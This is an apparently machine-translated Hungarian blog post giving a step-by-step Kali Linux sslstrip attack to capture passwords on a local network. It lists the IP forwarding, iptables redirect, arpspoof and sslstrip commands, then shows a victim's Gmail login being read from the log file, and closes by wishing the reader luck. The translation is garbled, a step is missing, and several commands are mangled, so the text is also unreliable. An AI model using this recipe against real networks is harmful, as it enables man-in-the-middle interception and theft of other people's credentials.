Kali Linux használata sslstrip, hogy elkapjam a jelszó - thecurrent - beszélt linux, joomla,

sslstrip segédprogram rögzíti http-forgalmat a számítógépről a helyi hálózaton, és így lehetővé teszi számunkra, hogy megtudja, a jelszavakat fel semmilyen oldalakon. Hogyan is használhatja az eszközt?

A kezdéshez nyisson meg egy terminált, majd futtassa a parancsot sslstrip -h, hogy megtanulják a szerszámok lehetőségeket.

Mielőtt megkezdené a munkát sslstrip kell tennünk néhány intézkedés

1. Biztosítani kell, hogy az IP Forwarding

echo '1'> / proc / sys / net / ipv4 / ip_forward

2. Engedélyezze átirányítani lekérdezéseket port 80-8080

iptables -t nat -A PREROUTING -p TCP -destination-port 80 -j REDIRECT -to-port 8080

3. Határozza meg az átjáró netstat NR

5. átirányítja minden http-forgalmat a mi számítógép az átjáró

arpspoof -i eth0 -t 192.168.71.128 -r 192.168.71.2

Most, anélkül, hogy bezárná a terminál ablakban nyissa meg egy másik, és futtatni lehallgatási 8080 használatával sslstrip:

sslstrip -l 8080

Most én vagyok az áldozat számítógépén, megyek a Google e-mail:

Miután bejöttem az e-mail a számítógépen Kali Linux terminál ablakot dolgozó sslstrip nyomjuk meg a Ctrl + c, hogy a művelet megszakításához. Minden információt egy fájlban tárolja sslstrip.log

Lássuk a fájl tartalmát:

macska sslstrip.log - login és a jelszó körül piros kerettel

Ez hogyan működik mindez, jó szerencsét!